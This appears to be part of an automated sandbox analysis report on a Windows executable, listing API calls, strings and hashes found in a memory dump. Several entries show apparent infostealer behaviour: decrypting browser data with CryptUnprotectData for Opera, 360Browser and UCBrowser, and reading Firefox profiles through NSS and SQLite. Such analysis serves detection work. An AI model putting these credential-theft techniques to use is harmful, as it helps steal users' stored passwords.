                                                                                                    • String ID: (
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0040E13E
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E198
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E1DC
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E22A
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E277
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E2C1
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E30B
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E34E
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040E390
                                                                                                    • wsprintfA.USER32 ref: 0040E409
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                      • Part of subcall function 0043584C: __EH_prolog.LIBCMT ref: 00435851
                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040ED19
                                                                                                    • LocalFree.KERNEL32(?,?,?), ref: 0040ED84
                                                                                                      • Part of subcall function 00445A55: _free.LIBCMT ref: 00445A68
                                                                                                      • Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
                                                                                                      • Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$H_prolog$Deallocate$CryptDataFreeLocalUnprotect_free_strcatwsprintf
                                                                                                    • String ID: 360Browser$Opera$S$UCBrowser
                                                                                                    • API String ID: 1533498561-2102145511
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
                                                                                                      • Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E
                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,004555FC,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00462452
                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004555FC,?,?,?,00000055,?,-00000050,?,?), ref: 0046247D
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00462511
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0046251F
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 004625E0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                    • String ID: 0&G$utf8
                                                                                                    • API String ID: 4147378913-2116212543
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __floor_pentium4
                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0041064D
                                                                                                      • Part of subcall function 00411E16: __EH_prolog.LIBCMT ref: 00411E1B
                                                                                                      • Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7
                                                                                                      • Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
                                                                                                      • Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C
                                                                                                    • LoadLibraryA.KERNEL32(00000000,?), ref: 00410699
                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 004106F5
                                                                                                      • Part of subcall function 0040BB39: __EH_prolog.LIBCMT ref: 0040BB3E
                                                                                                      • Part of subcall function 0040BB39: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0040BC51
                                                                                                      • Part of subcall function 0040BB39: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 0040BC58
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00410E60
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$FreeHeapLibrary$DeallocateEnvironmentFolderLoadPathProcessSpecialVariable_strcat
                                                                                                    • String ID: Opera
                                                                                                    • API String ID: 1239964785-505338728
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: 4$;g~OS^I^NV$UTC_$]l
                                                                                                    • API String ID: 3519838083-94711056
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: |XF$|XF
                                                                                                    • API String ID: 0-514644214
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
                                                                                                      • Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E
                                                                                                      • Part of subcall function 004571CB: _free.LIBCMT ref: 0045722D
                                                                                                      • Part of subcall function 004571CB: _free.LIBCMT ref: 00457263
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004627F8
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00462842
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00462908
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale$ErrorLast_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3140898709-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0044671D
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00446727
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00446734
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetLocalTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000001,00000000), ref: 0043E076
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000), ref: 0043E084
                                                                                                      • Part of subcall function 0043D95B: FileTimeToSystemTime.KERNEL32(?,?,?,?,00000000,?,0043E09B,?,?,?,?,?,?,?,?,00000001), ref: 0043D970
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043E0B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 568878067-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,00000001,?,0044EA2A,?,Microsoft Visual C++ Runtime Library,00012012,?,00000240,00000001,00421A95,?,?,?,00000000,00000480), ref: 0045C4E2
                                                                                                    • OutputDebugStringW.KERNEL32(00000000,?,0044EA2A,?,Microsoft Visual C++ Runtime Library,00012012,?,00000240,00000001,00421A95,?,?,?,00000000,00000480,A:\_Work\rc-build-v1-exe\json.hpp), ref: 0045C4F9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DebugDebuggerOutputPresentString
                                                                                                    • String ID:
                                                                                                    • API String ID: 4086329628-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0044099B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                    • String ID:
                                                                                                    • API String ID: 2325560087-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
                                                                                                      • Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E
                                                                                                      • Part of subcall function 004571CB: _free.LIBCMT ref: 0045722D
                                                                                                      • Part of subcall function 004571CB: _free.LIBCMT ref: 00457263
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00462A4B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast_free$InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2003897158-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
                                                                                                      • Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E
                                                                                                    • EnumSystemLocalesW.KERNEL32(004627A4,00000001,00000000,?,-00000050,?,00462DD2,00000000,?,?,?,00000055,?), ref: 004626F0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2417226690-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
                                                                                                      • Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E
                                                                                                      • Part of subcall function 004571CB: _free.LIBCMT ref: 0045722D
                                                                                                      • Part of subcall function 004571CB: _free.LIBCMT ref: 00457263
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 004625E0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast_free$InfoLocale
                                                                                                    • String ID: 0&G$utf8
                                                                                                    • API String ID: 2003897158-2116212543
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
                                                                                                      • Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E
                                                                                                    • EnumSystemLocalesW.KERNEL32(004629F7,00000001,00000002,?,-00000050,?,00462D96,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00462763
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2417226690-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 00452551: EnterCriticalSection.KERNEL32(?,?,00453DF7,00000000,00484E90,0000000C,00453DBE,?,?,00458540,?,?,0045736D,00000001,00000364,00000008), ref: 00452560
                                                                                                    • EnumSystemLocalesW.KERNEL32(0045856A,00000001,00485070,0000000C,00458A49,00000000), ref: 004585AF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1272433827-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
                                                                                                      • Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E
                                                                                                    • EnumSystemLocalesW.KERNEL32(0046258C,00000001,00000002,?,?,00462DF4,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0046266A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2417226690-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b5b0e66b16ccbd8f0a40714c19fa5bdb7e71b6b32d28678020640cb824cf4a89
                                                                                                    • Instruction ID: 2b68b11eeb88712b8ce7400ea382997c22786c23b16cca6d2aeda21fdd285ab6
                                                                                                    • Opcode Fuzzy Hash: b5b0e66b16ccbd8f0a40714c19fa5bdb7e71b6b32d28678020640cb824cf4a89
                                                                                                    • Instruction Fuzzy Hash: 7AE11575E002299FCF14CFA9D590AEDBBF5FB88314F2481AAE855E7340D634A9818F54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c0e3146ed4e506c00fe44265853dcf02891529dccaae15279d9a213ad0e351c1
                                                                                                    • Instruction ID: e946252db305763ed07a346dec792169a84f57976465df867b6f9558783c8005
                                                                                                    • Opcode Fuzzy Hash: c0e3146ed4e506c00fe44265853dcf02891529dccaae15279d9a213ad0e351c1
                                                                                                    • Instruction Fuzzy Hash: BC515E71E00119AFEF04CF99C981AAEBBB2EF88304F19805DE915AB341D7389E51DB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 82824502b330d7f56d0fd5b4110d415c4a04fe01cf4805b472d714490720a1ae
                                                                                                    • Instruction ID: ffbed51893eee56e5f0a6d5d594a499ec612e4216e0ed18c4b9e673d5f7a457b
                                                                                                    • Opcode Fuzzy Hash: 82824502b330d7f56d0fd5b4110d415c4a04fe01cf4805b472d714490720a1ae
                                                                                                    • Instruction Fuzzy Hash: D721B673F204394B770CC47E8C532BDB6E1C68C541745423EE8A6EA2C1D968D917E2E4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 90b5447c475a5e9687ff1c3da719cc89c4f53068e936a2e9c473093f8a0f27e2
                                                                                                    • Instruction ID: d4796199420aa186b6c44f707558acbf23b85472b2e64044f100dbabf6d3acde
                                                                                                    • Opcode Fuzzy Hash: 90b5447c475a5e9687ff1c3da719cc89c4f53068e936a2e9c473093f8a0f27e2
                                                                                                    • Instruction Fuzzy Hash: B911A723F30C296B675C81698C172BE91D2DBD824430F433BD826E7284F994DE23D294
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 32d2fa60569f027d70f6bd040317d7149808b2a5500fbd3f3a48173b9d07b044
                                                                                                    • Instruction ID: b08065770aaa3e5024261f6b8f27829de5e14fae179c59a4b636cbd334e7375d
                                                                                                    • Opcode Fuzzy Hash: 32d2fa60569f027d70f6bd040317d7149808b2a5500fbd3f3a48173b9d07b044
                                                                                                    • Instruction Fuzzy Hash: C02169705241B145864C5B3AAC2143BBB919B8721338B42BFED8BDA0D2C52ED5B5D7A4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a9a885f2fdba41f838a509d97cb48f81f2635d64a58ae0c9c204ea1fe0e0e8b7
                                                                                                    • Instruction ID: 0f35cd1cdfa2507b62c58bdd5256ef98e78387180735e39f6991d5b358c28599
                                                                                                    • Opcode Fuzzy Hash: a9a885f2fdba41f838a509d97cb48f81f2635d64a58ae0c9c204ea1fe0e0e8b7
                                                                                                    • Instruction Fuzzy Hash: 72F02B32650130DBC726DEAC8909B59739CF705B52F10825BED02E7392CAB8DE48D3CA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a384c0fe3c91c4020970930302fec913fc5f6a764468d93dc06b5bc6a1ce926e
                                                                                                    • Instruction ID: b71f545da49f6d3db7369e6d6598d851a446798c0fa16d89008dba216badf81b
                                                                                                    • Opcode Fuzzy Hash: a384c0fe3c91c4020970930302fec913fc5f6a764468d93dc06b5bc6a1ce926e
                                                                                                    • Instruction Fuzzy Hash: EFF03031621224DBCB26DF8CD845A4973ACEB45B55F11415BE901EB292C6B8DE04C7D9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00422688
                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000001,00000000), ref: 004226AC
                                                                                                      • Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
                                                                                                      • Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C
                                                                                                      • Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                    • NSS_Init.NSS3(?,?,?,?,?,?), ref: 004227B6
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                      • Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7
                                                                                                    • sqlite3_finalize.NSS3(?), ref: 00422C80
                                                                                                    • sqlite3_close.NSS3(?), ref: 00422C8A
                                                                                                    • NSS_Shutdown.NSS3(?,00000001,?,?,?), ref: 00422CC1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$Deallocate$EnvironmentFolderInitPathShutdownVariable_strcatsqlite3_closesqlite3_finalize
                                                                                                    • String ID: #9$' t"$.$7$='= $G$Profiles$WKIW$nt${`z4
                                                                                                    • API String ID: 3790890743-686067381
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$Info
                                                                                                    • String ID:
                                                                                                    • API String ID: 2509303402-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,00421A95,?,00000001), ref: 0044EB09
                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,00421A95,?,00000001), ref: 0044EB2D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Module$FileHandleName
                                                                                                    • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
                                                                                                    • API String ID: 4146042529-3261600717
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0042401B
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DeallocateH_prolog
                                                                                                    • String ID: 6rkw$; expected $; last read: '$syntax error $unexpected $while parsing
                                                                                                    • API String ID: 3708980276-377966253
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
                                                                                                    • API String ID: 3519838083-2786698324
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
                                                                                                    • API String ID: 3519838083-2786698324
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
                                                                                                    • API String ID: 3519838083-2786698324
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
                                                                                                    • API String ID: 3519838083-2786698324
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                    • API String ID: 0-537541572
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004181A3
                                                                                                      • Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
